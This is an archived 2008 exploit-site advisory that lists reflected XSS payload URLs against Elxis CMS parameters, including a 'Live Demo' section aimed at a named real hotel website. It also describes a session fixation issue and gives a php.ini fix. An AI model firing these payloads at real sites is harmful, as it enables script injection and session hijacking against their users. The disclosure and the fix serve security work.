elxis-xss.txt

elxis-xss.txt: Posted Oct 14, 2008; Authored by swappie aka faithlove; Elxis 2008.1 Nemesis suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; MD5 | ebdfb9d765bc810cafddbd35bb601bd1; Download | Favorite | Comments (0)

elxis-xss.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
################################################################ 
# Greetings to  --d3hydr8 -r45c4l -baltazar -sinner_01          #
#       -C1c4Tr1Z -Gabitzu and all darkc0de members            # 
;############################################################### 
# 
# Author: swappie [aka] faithlove 
# 
# Home : www.darkc0de.com
#
# Email : swappieakafaithlove@gmail.com
# 
# Do researching and share! 
# 
;############################################################### 
# 
# Title: Elxis 2008.1 Nemesis
#
# Issue Date: Monday, 29 September 2008
#
# CMS Link: http://www.elxis-downloads.com/fserver/96.html

# Vendor: http://www.elxis.org/
# 
#
;###############################################################
#
# Dork: I'm sure you can figure that by yourself, right?
#
#################################################################


----------
XSS Vulns;
----------

http://www.site.com/?>'"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>

----------
Live Demo;
----------

http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>


;==================================================================;
;==================================================================;

-----------------
Session Fixation;
-----------------


http://www.site.com/?PHPSESSID=[session_fixation]

Explanation:

The user's session ID could be fixed by the attacker before the user
even logs on the target server so it wouldn't be needed to get the session
ID afterwards.

How to fix the "session fixation" ?

There is a simple way to do it.

Step 1.

Open the file named php.ini from your server.

Step 2.

Look through the file for the following lines:

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

; session.use_only_cookies = 1    !![PLEASE NOTE THE ";"]!!


Step 3.

=> [ and make it look like this: ]

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

session.use_only_cookies = 1

Step 4.

Restart the web server, php, whatever.



Cheers,

swappie [aka] faithlove

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

elxis-xss.txt

elxis-xss.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

elxis-xss.txt

Share This

elxis-xss.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems